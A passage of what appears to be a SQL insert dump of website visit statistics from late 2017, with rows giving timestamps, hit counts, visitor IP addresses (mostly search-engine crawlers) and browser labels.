512,1,1,0,0,'54.36.148.194','other'),(193188,1514744686,1,0,1,0,'66.249.64.29',''),(193189,1514745274,1,1,0,0,'54.36.149.28','other'),(193190,1514745393,1,1,0,0,'54.36.148.136','other'),(193191,1514745545,1,0,1,0,'66.249.64.28',''),(193192,1514745635,1,1,0,0,'54.36.149.63','other'),(193193,1514745713,1,1,0,0,'37.145.10.63','msie'),(193194,1514746207,1,1,0,0,'193.194.127.223','chrome'),(193195,1514746326,1,1,0,0,'216.244.66.246','other'),(193196,1514747318,1,1,0,0,'54.36.148.115','other'),(193197,1514747547,1,1,0,0,'54.36.149.34','other'),(193198,1514747840,1,1,0,0,'54.36.148.51','other'),(193199,1514748077,1,1,0,0,'54.36.149.8','other'),(193200,1514748375,1,1,0,0,'54.36.148.183','other'),(193201,1514748651,1,0,1,0,'66.249.64.29',''),(193202,1514748702,1,1,0,0,'54.36.148.95','other'),(193203,1514749012,1,1,0,0,'54.36.148.103','other'),(193204,1514749034,1,1,0,0,'54.36.148.198','other'),(193205,1514749080,1,1,0,0,'54.36.148.61','other'),(193206,1514749095,1,1,0,0,'91.196.178.136','chrome'),(193207,1514749194,1,1,0,0,'138.68.99.134','other'),(193208,1514749733,1,1,0,0,'54.36.148.237','other'),(193209,1514749769,1,1,0,0,'54.36.148.159','other'),(193210,1514750179,1,1,0,0,'216.244.66.237','other'),(193211,1514750180,1,1,0,0,'54.36.149.59','other'),(193212,1514750559,1,1,0,0,'54.36.148.230','other'),(193213,1514750634,1,1,0,0,'54.36.148.19','other'),(193214,1514751343,1,1,0,0,'51.255.71.115','other'),(193215,1514751934,1,1,0,0,'54.36.149.97','other'),(193216,1514751941,1,1,0,0,'216.244.66.246','other'),(193217,1514752008,1,0,1,0,'66.249.64.30',''),(193218,1514752419,1,1,0,0,'40.77.167.183','other'),(193219,1514752466,1,1,0,0,'54.36.148.137','other'),(193220,1514752530,2,0,2,0,'66.249.64.29',''),(193221,1514752556,1,1,0,0,'207.46.13.149','other'),(193222,1514752561,1,1,0,0,'94.178.118.207','chrome'),(193223,1514753697,1,1,0,0,'54.36.148.235','other'),(193224,1514754167,1,1,0,0,'158.69.251.119','other'),(193225,1514754211,1,1,0,0,'8.29.198.27','other'),(193226,1514754422,1,1,0,0,'66.102.9.25','chrome'),(193227,1514754454,1,1,0,0,'54.36.148.137','other'),(193228,1514754837,1,1,0,0,'54.36.148.106','other'),(193229,1514755193,1,1,0,0,'54.36.149.95','other'),(193230,1514755441,1,1,0,0,'35.225.221.87','other'),(193231,1514755742,1,1,0,0,'54.36.149.23','other'),(193232,1514756022,1,1,0,0,'37.73.169.1','chrome'),(193233,1514756108,1,1,0,0,'91.196.178.7','chrome'),(193234,1514756122,1,1,0,0,'54.36.149.50','other'),(193235,1514756475,1,1,0,0,'54.36.148.39','other'),(193236,1514756800,1,1,0,0,'54.36.148.126','other'),(193237,1514756851,1,1,0,0,'54.36.149.1','other'),(193238,1514757084,1,1,0,0,'54.36.148.79','other'),(193239,1514757188,1,1,0,0,'54.36.148.238','other'),(193240,1514757473,1,1,0,0,'178.154.171.88','other'),(193241,1514758219,1,1,0,0,'40.77.167.54','other'),(193242,1514758231,2,0,2,0,'66.249.70.25',''),(193243,1514758835,1,1,0,0,'54.36.148.36','other'),(193244,1514758911,1,1,0,0,'54.36.148.170','other'),(193245,1514759359,1,1,0,0,'37.73.193.50','other'),(193246,1514760275,1,1,0,0,'95.24.38.69','msie'),(193247,1514760351,1,1,0,0,'185.26.183.75','chrome'),(193248,1514760508,1,1,0,0,'54.36.148.151','other'),(193249,1514760593,1,1,0,0,'54.36.148.234','other'),(193250,1514760834,1,1,0,0,'54.36.148.179','other'),(193251,1514761002,1,1,0,0,'128.72.77.181','msie'),(193252,1514761158,1,1,0,0,'54.36.148.206','other'),(193253,1514761179,1,1,0,0,'104.207.145.170','chrome'),(193254,1514761574,1,1,0,0,'54.36.148.93','other'),(193255,1514761656,1,1,0,0,'188.166.0.65','chrome'),(193256,1514761681,1,1,0,0,'178.94.172.93','chrome'),(193257,1514761715,1,1,0,0,'37.53.123.215','chrome'),(193258,1514761762,1,1,0,0,'54.36.148.12','other'),(193259,1514761891,1,1,0,0,'66.249.64.30','chrome'),(193260,1514762007,1,1,0,0,'46.211.120.221','chrome'),(193261,1514762676,1,1,0,0,'77.111.244.24','chrome'),(193262,1514762778,1,1,0,0,'40.77.167.117','other'),(193263,1514762901,1,1,0,0,'51.255.71.126','other'),(193264,1514763386,1,1,0,0,'54.36.148.176','other'),(193265,1514763703,1,1,0,0,'54.36.149.72','other'),(193266,1514763884,1,1,0,0,'54.36.149.12','other'),(193267,1514764108,1,0,1,0,'66.249.73.25',''),(193268,1514764183,1,1,0,0,'54.36.149.68','other'),(193269,1514764186,1,1,0,0,'216.244.66.237','other'),(193270,1514764292,1,1,0,0,'37.52.16.201','chrome'),(193271,1514764296,1,1,0,0,'46.211.102.142','chrome'),(193272,1514764312,1,1,0,0,'54.36.149.56','other'),(193273,1514764327,1,1,0,0,'54.36.148.159','other'),(193274,1514765055,1,1,0,0,'8.29.198.27','other'),(193275,1514765213,1,1,0,0,'54.36.148.39','other'),(193276,1514765928,2,2,0,0,'207.46.13.111','other'),(193277,1514766831,1,1,0,0,'51.255.71.128','other'),(193278,1514767197,1,1,0,0,'54.36.148.143','other'),(193279,1514767401,1,1,0,0,'54.36.148.20','other'),(193280,1514767736,1,1,0,0,'54.36.148.84','other'),(193281,1514767849,1,1,0,0,'54.36.148.77','other'),(193282,1514767894,1,1,0,0,'87.250.224.46','other'),(193283,1514768015,1,1,0,0,'37.73.199.173','chrome'),(193284,1514768030,1,1,0,0,'37.73.236.98','chrome'),(193285,1514768143,1,1,0,0,'54.36.149.61','other'),(193286,1514768260,1,1,0,0,'54.36.148.158','other'),(193287,1514768788,1,1,0,0,'54.36.148.114','other'),(193288,1514768929,1,1,0,0,'54.36.148.170','other'),(193289,1514768993,1,1,0,0,'54.36.149.54','other'),(193290,1514769390,1,1,0,0,'54.36.149.4','other'),(193291,1514769646,1,1,0,0,'54.36.148.17','other'),(193292,1514769904,1,1,0,0,'54.36.148.169','other'),(193293,1514770071,2,0,2,0,'66.249.73.23',''),(193294,1514770072,1,0,1,0,'66.249.73.24',''),(193295,1514770224,1,1,0,0,'54.36.148.105','other'),(193296,1514770909,1,1,0,0,'54.36.149.105','other'),(193297,1514771466,1,1,0,0,'54.36.148.230','other'),(193298,1514771501,1,1,0,0,'54.36.148.237','other'),(193299,1514771810,1,1,0,0,'54.36.149.81','other'),(193300,1514771932,1,1,0,0,'54.36.148.184','other'),(193301,1514771985,1,1,0,0,'54.36.149.66','other'),(193302,1514772003,1,1,0,0,'54.36.148.38','other'),(193303,1514772587,1,0,1,0,'66.249.73.221',''),(193304,1514772670,1,0,1,0,'66.249.73.222',''),(193305,1514772758,1,1,0,0,'54.36.148.134','other'),(193306,1514772767,1,1,0,0,'37.73.208.86','chrome'),(193307,1514772897,1,1,0,0,'54.36.148.130','other'),(193308,1514773631,1,1,0,0,'37.145.27.118','msie'),(193309,1514773873,1,1,0,0,'207.154.246.2','chrome'),(193310,1514774267,1,1,0,0,'207.46.13.169','other'),(193311,1514774326,1,1,0,0,'51.255.71.132','other'),(193312,1514775396,1,1,0,0,'66.249.73.24','chrome'),(193313,1514775897,1,1,0,0,'8.29.198.27','other'),(193314,1514776178,1,1,0,0,'37.9.113.157','other'),(193315,1514776450,1,1,0,0,'66.249.73.24','chrome'),(193316,1514777116,1,1,0,0,'51.255.71.117','other'),(193317,1514777180,1,1,0,0,'54.36.148.55','other'),(193318,1514777190,1,1,0,0,'54.36.148.249','other'),(193319,1514777390,1,1,0,0,'66.249.73.25','chrome'),(193320,1514777397,1,1,0,0,'216.244.66.194','other'),(193321,1514777534,1,1,0,0,'54.36.148.63','other'),(193322,1514777608,1,1,0,0,'54.36.148.119','other'),(193323,1514777912,1,1,0,0,'54.36.149.33','other'),(193324,1514778366,1,1,0,0,'54.36.148.162','other'),(193325,1514778454,1,0,1,0,'66.249.73.24',''),(193326,1514779068,1,1,0,0,'54.36.148.204','other'),(193327,1514779472,1,1,0,0,'54.36.148.181','other'),(193328,1514779705,1,1,0,0,'54.36.149.55','other'),(193329,1514779784,1,1,0,0,'54.36.149.64','other'),(193330,1514779951,1,1,0,0,'141.8.142.74','other'),(193331,1514779977,1,1,0,0,'54.36.148.38','other'),(193332,1514780306,1,1,0,0,'66.249.73.24','chrome'),(193333,1514781240,1,1,0,0,'54.36.149.90','other'),(193334,1514781277,1,1,0,0,'54.36.149.21','other'),(193335,1514781442,1,1,0,0,'54.36.148.162','other'),(193336,1514781817,1,1,0,0,'54.36.149.49','other'),(193337,1514782547,1,1,0,0,'54.36.148.105','other'),(193338,1514782668,1,1,0,0,'54.36.149.30','other'),(193339,1514782695,1,1,0,0,'54.36.148.153','other'),(193340,1514782885,1,1,0,0,'54.36.148.146','other'),(193341,1514783257,1,1,0,0,'66.249.73.222','chrome'),(193342,1514783409,1,1,0,0,'54.36.148.13','other'),(193343,1514783513,1,1,0,0,'35.225.221.87','other'),(193344,1514783935,1,1,0,0,'54.36.148.242','other'),(193345,1514784761,1,1,0,0,'54.36.149.82','other'),(193346,1514785084,1,1,0,0,'54.36.148.251','other'),(193347,1514785242,1,1,0,0,'54.36.148.72','other'),(193348,1514785372,1,1,0,0,'157.55.39.42','other'),(193349,1514785612,1,1,0,0,'54.36.148.194','other'),(193350,1514786125,1,1,0,0,'54.36.149.89','other'),(193351,1514786728,1,1,0,0,'8.29.198.26','other'),(193352,1514787221,1,1,0,0,'54.36.148.50','other'),(193353,1514788217,1,1,0,0,'54.36.149.74','other'),(193354,1514788665,1,1,0,0,'54.36.148.98','other'),(193355,1514789116,1,1,0,0,'54.36.148.169','other'),(193356,1514789366,1,1,0,0,'66.249.73.221','chrome'),(193357,1514789382,1,1,0,0,'54.36.148.151','other'),(193358,1514789652,1,1,0,0,'66.249.73.23','chrome'),(193359,1514789721,1,1,0,0,'54.36.149.32','other'),(193360,1514789847,1,1,0,0,'54.36.148.240','other'),(193361,1514789875,1,1,0,0,'54.36.148.191','other'),(193362,1514789998,1,1,0,0,'54.36.148.126','other'),(193363,1514790086,1,1,0,0,'54.36.148.11','other'),(193364,1514790166,1,1,0,0,'54.36.149.67','other'),(193365,1514790230,1,1,0,0,'54.36.149.93','other'),(193366,1514790404,1,1,0,0,'109.63.252.234','msie'),(193367,1514790638,1,1,0,0,'51.255.71.113','other'),(193368,1514790925,1,1,0,0,'54.36.148.79','other'),(193369,1514790936,1,1,0,0,'54.36.148.32','other'),(193370,1514790994,1,1,0,0,'54.36.148.191','other'),(193371,1514791146,1,1,0,0,'54.36.148.230','other'),(193372,1514791227,1,1,0,0,'54.36.148.197','other'),(193373,1514791798,1,1,0,0,'141.8.142.74','other'),(193374,1514791967,1,1,0,0,'54.36.148.72','other'),(193375,1514792230,2,2,0,0,'66.249.73.221','chrome'),(193376,1514792458,1,1,0,0,'54.36.148.32','other'),(193377,1514792532,1,1,0,0,'216.244.66.194','other'),(193378,1514793195,1,1,0,0,'54.36.149.74','other'),(193379,1514793387,1,1,0,0,'54.36.148.240','other'),(193380,1514793622,1,1,0,0,'66.249.73.25','chrome'),(193381,1514793725,1,1,0,0,'54.36.148.143','other'),(193382,1514794151,1,1,0,0,'54.36.148.98','other'),(193383,1514794421,1,1,0,0,'54.36.148.252','other'),(193384,1514794455,1,1,0,0,'54.36.148.204','other'),(193385,1514794681,1,1,0,0,'141.8.142.74','other'),(193386,1514794797,1,1,0,0,'54.36.149.7','other'),(193387,1514794806,1,1,0,0,'54.36.148.176','other'),(193388,1514794827,1,1,0,0,'54.36.149.48','other'),(193389,1514794901,2,2,0,0,'95.213.141.124','opera'),(193390,1514795151,1,1,0,0,'54.36.148.158','other'),(193391,1514795165,1,0,1,0,'66.249.73.25',''),(193392,1514795192,1,1,0,0,'54.36.148.38','other'),(193393,1514795337,1,1,0,0,'54.36.148.160','other'),(193394,1514795357,1,1,0,0,'54.36.148.113','other'),(193395,1514795579,1,1,0,0,'54.36.149.72','other'),(193396,1514795860,1,1,0,0,'54.36.148.40','other'),(193397,1514796080,1,1,0,0,'91.196.178.129','chrome'),(193398,1514796165,1,1,0,0,'157.55.39.126','other'),(193399,1514796322,1,1,0,0,'54.36.148.32','other'),(193400,1514796371,1,1,0,0,'54.36.148.17','other'),(193401,1514796456,1,1,0,0,'54.36.148.131','other'),(193403,1514796562,1,1,0,0,'54.36.148.204','other'),(193404,1514796653,1,0,1,0,'66.249.73.221',''),(193405,1514796693,1,1,0,0,'54.36.148.182','other'),(193406,1514797364,1,1,0,0,'54.36.148.208','other'),(193407,1514797499,1,1,0,0,'54.36.149.69','other'),(193408,1514797564,1,1,0,0,'8.29.198.26','other'),(193409,1514797711,1,1,0,0,'54.36.149.36','other'),(193410,1514797864,1,1,0,0,'54.36.148.123','other'),(193411,1514798241,1,1,0,0,'172.241.151.29','other'),(193412,1514798243,1,1,0,0,'54.36.148.157','other'),(193413,1514798334,1,1,0,0,'54.36.148.53','other'),(193414,1514798874,1,1,0,0,'51.255.71.131','other'),(193415,1514798885,1,1,0,0,'207.46.13.120','other'),(193416,1514798886,1,1,0,0,'54.36.148.84','other'),(193417,1514799104,1,1,0,0,'54.36.148.128','other'),(193418,1514799365,1,1,0,0,'54.36.148.163','other'),(193419,1514799448,1,1,0,0,'54.36.148.102','other'),(193420,1514799901,1,1,0,0,'109.86.80.57','chrome'),(193421,1514800017,1,1,0,0,'40.77.167.133','other'),(193422,1514800109,1,1,0,0,'54.36.148.105','other'),(193423,1514800119,1,1,0,0,'66.249.73.221','chrome'),(193424,1514800277,1,1,0,0,'54.36.148.106','other'),(193425,1514800347,1,1,0,0,'141.8.142.74','other'),(193426,1514800606,1,1,0,0,'54.36.149.78','other'),(193427,1514800694,1,1,0,0,'91.196.178.41','chrome'),(193428,1514801229,6,6,0,0,'167.114.1.124','other'),(193429,1514801569,1,1,0,0,'54.36.148.73','other'),(193430,1514801619,1,1,0,0,'54.36.148.191','other'),(193431,1514801828,1,1,0,0,'37.9.113.74','other'),(193432,1514801876,1,1,0,0,'54.36.148.54','other'),(193433,1514802263,1,1,0,0,'54.36.148.162','other'),(193434,1514802300,1,1,0,0,'141.8.132.19','other'),(193435,1514802493,2,2,0,0,'162.210.196.97','other'),(193436,1514802580,1,1,0,0,'51.255.71.115','other'),(193437,1514802621,1,1,0,0,'54.36.148.26','other'),(193438,1514802691,1,1,0,0,'87.250.224.125','other'),(193439,1514802781,1,1,0,0,'54.36.148.35','other'),(193440,1514802854,1,1,0,0,'54.36.148.254','other'),(193441,1514802954,1,1,0,0,'54.36.148.183','other'),(193442,1514803088,1,1,0,0,'54.36.148.180','other'),(193443,1514803821,1,1,0,0,'54.36.148.18','other'),(193444,1514804157,1,1,0,0,'54.36.148.110','other'),(193445,1514804928,1,1,0,0,'54.36.148.153','other'),(193446,1514804937,1,1,0,0,'54.36.148.245','other'),(193447,1514804992,1,1,0,0,'54.36.148.117','other'),(193448,1514805158,1,1,0,0,'54.36.148.101','other'),(193449,1514805195,1,1,0,0,'54.36.149.83','other'),(193450,1514805396,1,1,0,0,'54.36.148.114','other'),(193451,1514805474,1,1,0,0,'54.36.149.105','other'),(193452,1514805784,1,1,0,0,'54.36.148.104','other'),(193453,1514805818,1,1,0,0,'51.255.71.126','other'),(193454,1514805864,1,1,0,0,'91.196.178.167','chrome'),(193455,1514805880,1,1,0,0,'54.36.149.23','other'),(193456,1514806637,1,1,0,0,'91.196.178.68','chrome'),(193457,1514806784,1,1,0,0,'141.8.142.74','other'),(193458,1514807243,1,1,0,0,'91.209.11.236','other'),(193459,1514807698,1,1,0,0,'54.36.148.90','other'),(193460,1514807740,1,1,0,0,'54.36.148.88','other'),(193461,1514807816,1,1,0,0,'54.36.149.14','other'),(193462,1514808118,1,1,0,0,'146.185.223.221','msie'),(193463,1514808266,1,1,0,0,'54.36.148.111','other'),(193464,1514808407,1,1,0,0,'8.29.198.25','other'),(193465,1514808784,1,1,0,0,'54.36.149.43','other'),(193466,1514809026,2,2,0,0,'92.113.126.60','firefox'),(193467,1514809059,1,1,0,0,'54.36.149.85','other'),(193468,1514809140,1,1,0,0,'141.8.142.74','other'),(193469,1514809902,1,1,0,0,'54.36.149.60','other'),(193470,1514809936,1,1,0,0,'54.36.148.25','other'),(193471,1514810568,1,1,0,0,'54.36.148.130','other'),(193472,1514810615,1,1,0,0,'54.36.148.107','other'),(193473,1514810748,1,1,0,0,'109.63.194.65','msie'),(193474,1514810868,1,0,1,0,'66.249.73.222',''),(193475,1514811086,1,1,0,0,'172.98.166.130','other'),(193476,1514811100,1,1,0,0,'54.36.148.254','other'),(193477,1514811370,1,1,0,0,'91.209.11.236','other'),(193478,1514811630,1,1,0,0,'178.154.171.88','other'),(193479,1514811635,1,1,0,0,'146.185.223.5','chrome'),(193480,1514812197,1,1,0,0,'54.36.148.37','other'),(193481,1514812268,1,1,0,0,'54.36.148.16','other'),(193482,1514812278,1,1,0,0,'92.113.126.60','firefox'),(193483,1514812458,1,1,0,0,'141.8.142.74','other'),(193484,1514812485,1,1,0,0,'157.55.39.191','other'),(193485,1514812535,1,1,0,0,'51.255.71.122','other'),(193486,1514812776,1,1,0,0,'54.36.148.156','other'),(193487,1514812803,1,1,0,0,'54.36.148.194','other'),(193488,1514813089,1,1,0,0,'51.255.71.127','other'),(193489,1514813203,1,1,0,0,'54.36.148.174','other'),(193490,1514813302,1,1,0,0,'51.255.71.113','other'),(193491,1514813537,1,1,0,0,'54.36.148.162','other'),(193492,1514813554,1,1,0,0,'141.8.142.74','other'),(193493,1514813737,1,1,0,0,'66.249.73.222','chrome'),(193494,1514813745,1,1,0,0,'66.249.73.221','chrome'),(193495,1514814118,1,1,0,0,'54.36.148.173','other'),(193496,1514814204,1,0,1,0,'66.249.73.25',''),(193497,1514814804,1,1,0,0,'54.36.148.74','other'),(193498,1514814896,1,0,1,0,'66.249.73.24',''),(193499,1514815173,1,1,0,0,'54.36.148.245','other'),(193500,1514815238,1,0,1,0,'66.249.73.23',''),(193501,1514815721,1,1,0,0,'125.209.235.167','other'),(193502,1514815762,1,0,1,0,'66.249.73.25',''),(193503,1514815864,1,1,0,0,'54.36.148.128','other'),(193504,1514816113,1,1,0,0,'216.244.66.237','other'),(193505,1514816124,1,1,0,0,'54.36.149.83','other'),(193506,1514816267,1,1,0,0,'66.249.73.220','chrome'),(193507,1514816275,1,0,1,0,'66.249.73.24',''),(193508,1514816870,1,0,1,0,'68.180.229.52',''),(193509,1514816880,2,2,0,0,'141.8.142.74','other'),(193510,1514816914,1,1,0,0,'91.209.11.236','other'),(193511,1514816971,2,2,0,0,'40.77.167.180','other'),(193512,1514816996,1,1,0,0,'54.36.149.101','other'),(193513,1514817064,1,1,0,0,'157.55.39.191','other'),(193514,1514817501,2,2,0,0,'157.55.39.146','other'),(193515,1514817591,1,1,0,0,'54.36.148.176','other'),(193516,1514818679,1,1,0,0,'91.209.11.236','other'),(193517,1514818897,1,1,0,0,'54.36.148.65','other'),(193518,1514818961,1,1,0,0,'54.36.148.237','other'),(193519,1514819051,1,1,0,0,'157.55.39.191','other'),(193520,1514819203,1,0,1,0,'66.249.73.24',''),(193521,1514819243,1,1,0,0,'8.29.198.26','other'),(193522,1514819349,1,1,0,0,'54.36.149.31','other'),(193523,1514819482,1,1,0,0,'54.36.149.62','other'),(193524,1514819684,1,1,0,0,'51.255.71.131','other'),(193525,1514819742,1,1,0,0,'141.8.142.74','other'),(193526,1514819743,1,1,0,0,'178.154.171.88','other'),(193527,1514819961,1,1,0,0,'54.36.148.49','other'),(193528,1514820081,1,1,0,0,'54.36.149.74','other'),(193529,1514820331,1,1,0,0,'91.209.11.236','other'),(193530,1514820417,1,1,0,0,'54.36.148.33','other'),(193531,1514820607,1,1,0,0,'157.55.39.191','other'),(193532,1514820685,1,1,0,0,'54.36.149.69','other'),(193533,1514820763,1,1,0,0,'40.77.167.180','other'),(193534,1514821204,1,1,0,0,'54.36.148.102','other'),(193535,1514821286,1,1,0,0,'54.36.149.14','other'),(193536,1514821309,1,1,0,0,'95.135.213.210','chrome'),(193537,1514821496,1,1,0,0,'54.36.148.245','other'),(193538,1514821640,1,1,0,0,'54.36.148.194','other'),(193539,1514821741,1,1,0,0,'178.92.74.21','chrome'),(193540,1514822289,1,1,0,0,'54.36.149.89','other'),(193541,1514822476,1,0,1,0,'66.249.73.220',''),(193542,1514822621,1,1,0,0,'128.69.211.52','msie'),(193543,1514822830,1,1,0,0,'54.36.148.234','other'),(193544,1514822844,1,1,0,0,'54.36.148.61','other'),(193545,1514823331,1,1,0,0,'54.36.148.231','other'),(193546,1514823403,1,1,0,0,'51.255.71.132','other'),(193547,1514823404,1,1,0,0,'54.36.148.141','other'),(193548,1514823755,1,1,0,0,'157.55.39.146','other'),(193549,1514824038,1,1,0,0,'35.225.221.87','other'),(193550,1514824788,1,1,0,0,'91.209.11.236','other'),(193551,1514825174,1,1,0,0,'54.36.148.51','other'),(193552,1514825250,1,1,0,0,'54.36.148.102','other'),(193553,1514825321,1,1,0,0,'54.36.148.245','other'),(193554,1514825323,1,1,0,0,'157.55.39.191','other'),(193555,1514825516,1,1,0,0,'109.63.195.76','chrome'),(193556,1514825518,1,1,0,0,'54.36.149.19','other'),(193557,1514825843,1,1,0,0,'54.36.148.27','other'),(193558,1514825908,1,1,0,0,'54.36.149.59','other'),(193559,1514825954,1,1,0,0,'54.36.149.85','other'),(193560,1514826175,1,1,0,0,'51.255.71.117','other'),(193561,1514826658,1,1,0,0,'54.36.148.91','other'),(193562,1514826688,1,1,0,0,'54.36.148.60','other'),(193563,1514826949,1,1,0,0,'54.36.149.2','other'),(193564,1514826955,1,1,0,0,'54.36.149.91','other'),(193565,1514827047,1,1,0,0,'54.36.148.189','other'),(193566,1514827259,1,1,0,0,'73.44.62.35','chrome'),(193567,1514827842,1,1,0,0,'54.36.149.60','other'),(193568,1514827843,1,1,0,0,'216.244.66.237','other'),(193569,1514828242,1,1,0,0,'54.36.149.39','other'),(193570,1514828270,1,1,0,0,'91.209.11.236','other'),(193571,1514828351,1,1,0,0,'54.36.148.158','other'),(193572,1514828474,1,1,0,0,'109.173.110.80','msie'),(193573,1514828532,1,1,0,0,'54.36.149.19','other'),(193574,1514828541,1,1,0,0,'54.36.149.95','other'),(193575,1514828561,1,1,0,0,'54.36.148.127','other'),(193576,1514828734,1,0,1,0,'66.249.70.27',''),(193577,1514829158,1,1,0,0,'92.113.126.60','firefox'),(193578,1514829189,1,0,1,0,'66.249.64.30',''),(193579,1514829210,1,0,1,0,'66.249.64.28',''),(193580,1514829249,1,1,0,0,'40.77.167.178','other'),(193581,1514829795,1,1,0,0,'54.36.149.104','other'),(193582,1514829881,1,1,0,0,'54.36.148.163','other'),(193583,1514829928,1,1,0,0,'54.36.148.71','other'),(193584,1514830026,1,1,0,0,'51.255.71.129','other'),(193585,1514830075,1,1,0,0,'95.220.95.55','chrome'),(193586,1514830079,1,1,0,0,'8.29.198.27','other'),(193587,1514830125,1,1,0,0,'91.209.11.236','other'),(193588,1514830252,1,1,0,0,'141.8.142.74','other'),(193589,1514830292,1,1,0,0,'54.36.148.241','other'),(193590,1514830319,1,1,0,0,'54.36.148.88','other'),(193591,1514830643,1,1,0,0,'54.36.148.42','other'),(193592,1514831060,1,1,0,0,'54.36.148.59','other'),(193593,1514831077,1,1,0,0,'54.36.148.144','other'),(193594,1514831121,1,1,0,0,'91.209.11.236','other'),(193595,1514831189,1,1,0,0,'54.36.148.118','other'),(193596,1514831310,1,1,0,0,'54.36.148.120','other'),(193597,1514831409,1,1,0,0,'54.36.149.63','other'),(193598,1514832030,1,1,0,0,'54.36.148.17','other'),(193599,1514832053,1,1,0,0,'54.36.148.247','other'),(193600,1514832335,1,1,0,0,'54.36.148.66','other'),(193601,1514832390,1,1,0,0,'54.36.148.240','other'),(193602,1514833130,1,1,0,0,'54.36.148.57','other'),(193603,1514833182,1,1,0,0,'54.36.149.72','other'),(193604,1514833436,1,1,0,0,'54.36.148.87','other'),(193605,1514833602,1,1,0,0,'54.36.148.190','other'),(193606,1514833621,1,1,0,0,'54.36.149.2','other'),(193607,1514833728,1,1,0,0,'40.77.167.95','other'),(193608,1514833775,1,1,0,0,'54.36.148.164','other'),(193609,1514833777,1,0,1,0,'66.249.70.27',''),(193610,1514833815,1,1,0,0,'91.209.11.236','other'),(193611,1514833893,1,1,0,0,'40.77.167.180','other'),(193612,1514834029,1,1,0,0,'66.249.70.29','chrome'),(193613,1514834219,1,1,0,0,'51.255.71.113','other'),(193614,1514834601,1,1,0,0,'54.36.148.53','other'),(193615,1514834833,1,1,0,0,'54.36.148.154','other'),(193616,1514834979,1,1,0,0,'54.36.148.81','other'),(193617,1514835236,1,1,0,0,'54.36.148.63','other'),(193618,1514835536,1,1,0,0,'193.194.127.217','chrome'),(193619,1514835610,1,1,0,0,'54.36.148.171','other'),(193620,1514835814,1,1,0,0,'66.249.64.30','chrome'),(193621,1514835834,1,1,0,0,'91.196.178.136','other'),(193622,1514836446,1,1,0,0,'54.36.148.41','other'),(193623,1514836473,1,1,0,0,'51.255.71.119','other'),(193624,1514836505,1,1,0,0,'54.36.148.206','other'),(193625,1514836737,1,1,0,0,'54.36.149.51','other'),(193626,1514837137,1,1,0,0,'51.255.71.130','other'),(193627,1514837320,1,1,0,0,'91.209.11.236','other'),(193628,1514837401,1,1,0,0,'54.36.149.63','other'),(193629,1514837832,1,1,0,0,'54.36.148.116','other'),(193630,1514837981,1,1,0,0,'54.36.148.71','other'),(193631,1514838043,1,1,0,0,'54.36.148.186','other'),(193632,1514838080,1,1,0,0,'54.36.148.240','other'),(193633,1514838380,1,1,0,0,'54.36.149.105','other'),(193634,1514838702,1,1,0,0,'54.36.149.104','other'),(193635,1514838711,1,1,0,0,'54.36.148.144','other'),(193636,1514839002,1,1,0,0,'54.36.148.246','other'),(193637,1514839131,1,1,0,0,'54.36.148.150','other'),(193638,1514839301,1,1,0,0,'54.36.148.56','other'),(193639,1514840382,1,1,0,0,'54.36.148.116','other'),(193640,1514840884,1,1,0,0,'54.36.148.29','other'),(193641,1514840887,1,1,0,0,'54.36.148.105','other'),(193642,1514840912,1,1,0,0,'8.29.198.25','other'),(193643,1514841529,1,1,0,0,'40.77.167.112','other'),(193644,1514841713,2,2,0,0,'91.209.11.236','other'),(193645,1514841960,1,1,0,0,'54.36.148.23','other'),(193646,1514842031,1,1,0,0,'157.55.39.158','other'),(193647,1514842033,1,1,0,0,'54.36.149.63','other'),(193648,1514842050,1,1,0,0,'54.36.148.139','other'),(193649,1514842157,1,1,0,0,'54.36.149.103','other'),(193650,1514842335,2,2,0,0,'54.36.148.156','other'),(193651,1514842432,1,1,0,0,'54.36.148.248','other'),(193652,1514842465,6,6,0,0,'198.245.49.215','other'),(193653,1514843148,1,1,0,0,'35.225.221.87','other'),(193654,1514843445,1,1,0,0,'54.36.148.21','other'),(193655,1514843705,76,76,0,0,'23.237.4.26','other'),(193656,1514843711,1,1,0,0,'54.36.148.29','other'),(193657,1514843722,1,1,0,0,'91.209.11.236','other'),(193658,1514844714,1,1,0,0,'54.36.149.59','other'),(193659,1514845063,1,0,1,0,'66.249.70.27',''),(193660,1514845241,1,1,0,0,'54.36.148.10','other'),(193661,1514845269,1,1,0,0,'54.36.148.159','other'),(193662,1514845401,1,1,0,0,'54.36.148.141','other'),(193663,1514845403,1,1,0,0,'54.36.148.14','other'),(193664,1514845604,2,2,0,0,'51.255.71.126','other'),(193665,1514845894,1,1,0,0,'207.46.13.128','other'),(193666,1514846499,1,1,0,0,'54.36.148.200','other'),(193667,1514846552,1,1,0,0,'54.36.148.92','other'),(193668,1514846828,1,1,0,0,'54.36.148.155','other'),(193669,1514847051,1,1,0,0,'51.255.71.133','other'),(193670,1514847256,1,1,0,0,'54.36.148.90','other'),(193671,1514847317,1,1,0,0,'54.36.148.67','other'),(193672,1514847436,1,1,0,0,'91.209.11.236','other'),(193673,1514847652,1,1,0,0,'207.46.13.147','other'),(193674,1514848007,1,1,0,0,'207.46.13.49','other'),(193675,1514848317,1,1,0,0,'54.36.148.128','other'),(193676,1514849101,1,1,0,0,'54.36.149.19','other'),(193677,1514849394,1,1,0,0,'157.55.39.158','other'),(193678,1514849865,1,0,1,0,'66.249.64.30',''),(193679,1514849904,1,1,0,0,'54.36.149.14','other'),(193680,1514850435,1,1,0,0,'66.249.70.29','chrome'),(193681,1514850462,1,1,0,0,'66.249.64.29','chrome'),(193682,1514850560,1,1,0,0,'54.36.148.18','other'),(193683,1514850894,1,1,0,0,'54.36.148.158','other'),(193684,1514851575,1,1,0,0,'54.36.149.29','other'),(193685,1514851628,1,1,0,0,'54.36.148.154','other'),(193686,1514851743,1,1,0,0,'8.29.198.26','other'),(193687,1514851882,1,1,0,0,'54.36.148.133','other'),(193688,1514851990,1,1,0,0,'54.36.149.58','other'),(193689,1514852078,1,1,0,0,'54.36.148.100','other'),(193690,1514852128,1,1,0,0,'157.55.39.158','other'),(193691,1514852258,1,1,0,0,'207.46.13.46','other'),(193692,1514852539,1,1,0,0,'54.36.148.192','other'),(193693,1514852640,1,1,0,0,'51.255.71.119','other'),(193694,1514852684,2,2,0,0,'91.209.11.236','other'),(193695,1514853748,1,0,1,0,'66.249.64.29',''),(193696,1514854012,1,1,0,0,'54.36.149.24','other'),(193697,1514854367,1,1,0,0,'54.36.148.77','other'),(193698,1514854410,2,2,0,0,'35.225.221.87','other'),(193699,1514855174,1,1,0,0,'54.36.149.75','other'),(193700,1514855277,1,0,1,0,'66.249.64.29',''),(193701,1514855642,1,1,0,0,'54.36.148.152','other'),(193702,1514855673,1,1,0,0,'